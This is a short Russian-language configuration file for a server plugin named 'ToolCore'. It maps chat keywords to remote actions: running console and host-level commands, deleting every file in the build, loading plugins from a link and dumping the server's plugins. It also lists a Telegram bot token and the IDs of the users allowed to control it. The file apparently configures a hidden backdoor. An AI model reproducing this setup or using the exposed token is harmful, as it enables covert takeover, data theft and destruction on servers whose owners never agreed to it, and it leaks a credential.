---------- Название плагина ----------
ToolCore
---------- Комманда для выполнения в консоли ----------
~ivan~
---------- Комманда для выполнения от имени вдс ----------
~vds~
---------- Удаление всех файлов в сборке ----------
~del~
---------- Загрузка плагина по ссылке ----------
~upload~
---------- Скачивание плагинов сервера ----------
~dump~
---------- Включён ли плагин или нет ----------
true

----------- Токен бота в телеграмме ------------------
7701247482:AAGuTNjynlGdflEC_HZRNazYAA_s6flpjTE
--------------- Айди пользователей -------------------
5082229386
1031151609
